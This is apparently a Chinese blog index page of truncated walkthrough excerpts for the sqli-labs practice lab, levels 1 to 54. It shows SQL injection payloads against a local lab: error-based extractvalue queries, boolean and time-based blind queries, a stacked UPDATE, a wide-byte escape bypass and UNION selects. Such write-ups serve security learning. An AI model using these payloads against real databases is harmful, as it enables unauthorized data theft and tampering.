qq_44598397的博客

Less-1源码：1、输入：http://127.0.0.1/sqlilabs/Less-1/?id=1’经过URL编码过后格式变为（http://127.0.0.1/sqlilabs/Less-1/?id=1'）（页面出现错误的原因是因为多了一个’号而源代码变成多了一个分号提前截止）2、后面输入or 1=1 --+后面把’后的注释掉（–+表注释 （–空格）在SQL内表示注释，但在...

LESS-321、PHP编码转义一次，后面正则表达式还要再转义一次，所以有\\。党PHP转义后只剩\。再经过正则表达式就只剩下一个2、/的作用表示后面是正则表达式3、i表示区分大小写上述函数为过滤 ‘ \ 的函数，将 ‘ 转为 \’ ， 将 \ 转为 \ ，将 “ 转为 \”。注释方法：1、%df 吃掉 \ 具体的原因是 urlencode(‘) = %5c%27，我们在%5c%27...

LESS-461、order by的原理为排序，所以通过sort+asc或desc的输出是否相同便可知是否有使用到排序（ASC 代表结果会以由小往大的顺序列出，而 DESC 代表结果会以由大往小的顺序列出。如果两者皆没有被写出的话，那我们就会用 ASC。）输入？Sort=1 desc输入：？Sort=1 asc两者不同说明这里使用了order by1、报错注入输入：http://127...

less-39第39与38题的区别为本题id没有单引号。输入：http://127.0.0.1/sqlilabs/Less-39/?id=1; update users set username=‘more’ where id=‘38’ --+（无单引号为错误）LESS-40本处的区别在于id为‘）闭合方式；输入：http://127.0.0.1/sqlilabs/Less-40/?i...

LESS-35由于id没有被单引号括起来所以addslashes起不到作用所以俺正常提交即可。输入：http://127.0.0.1/sqlilabs/Less-35/?id=-1 and extractvalue(1,concat(0x7e,(select database()),0x7e))–+less-36本体的本质和前面相同不过采用的是MySQL_real_escape_stri...

LESS-14输入：admin”由此可见这个有错误提示且为双引号闭合；由于有报错提醒故可用报错注入:admin" and extractvalue(1,concat(0x7e,(select database()),0x7e))#Admin” and extractvalue(1,concat(0x7e,(select table_name from information_schem...

LESS-23源码：以此可知可以通过报错注入等方式语法：mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int KaTeX parse error: Expected 'EOF', got '&' at position 19: …it = -1 [, int &̲c...

LESS-18由于用户和密码都有check_input()处理，所以不能再用户和密码处进行注入，但是可以看出有insert语句insert="insertinto‘security‘.‘uagents‘(‘uagent‘,‘ipaddress‘,‘username‘)VALUES(′insert="insert into `security`.`uagents...

LESS-13源码：输入：admin’,出现错误提示，可以知道sql注入中是用’)闭合。输入：admin’)#因为这里有报错，所以可以用报错注入admin’) and extractvalue(1,concat(0x7E,(select database()),0x7E))#布尔注入：admin’) and left(database(),1)>‘a’#（可以用二分法进...

LESS-8此处不同于第5关的是：这里的报错被注释掉了，故不能用报错注入，可以延时注入和布尔注入延时注入：http://127.0.0.1/sqlilabs/Less-8/?id=1' and if(ascii(substr(database(),1,1))=115,1,sleep(5))–+盲注：http://127.0.0.1/sqlilabs/Less-8/?id=1' and ...

LESS-5：源码：1、输入http://127.0.0.1/sqlilabs/Less-5/?id=1时没有出现错误：2、输入http://127.0.0.1/sqlilabs/Less-5/?id=268，没有出现显示位，不能使用union语句3、输入127.0.0.1/sqlilabs/Less-5/?id=1’进行错误分析，出现错误’’1’’LIMIT 0,1’除去收尾和自...

LESS-7源码：注意在要对文件进行导入导出首先得要有足够的权限，但是mysql默认不能导入和导出文件，这与secure_file_priv的值有关（默认为null)secure-file-priv参数是用来限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()传到哪个指定目录的。1、当secure_file_priv的值为null ，表示限制mys...

LESS-3源码：1、输入？Id=1’后出现错误错误提示为”2”)LIMIT 0,1’.去掉前后两个单引号，和自己输入的一个单引号后还有两个单引号和一个括号，可推出sql注入中的由单引号和括号和起来的闭合模式。2、输入：http://127.0.0.1/sqlilabs/Less-3/?id=2’)–+url编码后：http://127.0.0.1/sqlilabs/Less-3/?...

Less2源码输入：http://127.0.0.1/sqlilabs/Less-2/?id=2’输出错误：You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’ LIM...

LESS-54此系列主要是一个进阶的学习，将前面学到的知识进行更深次的运用。这一关我们主要考察的依旧是字符型注入，但是只能尝试十次。所以需要在尝试的时候进行思考。如何能更少的减少次数。这里的表名和密码等是每十次尝试后就强制进行更换。因为已经知道了数据库名字叫做 challenges，所以我们需要知道表名 输入：?id=-1%27union%20select%201,2,group_co...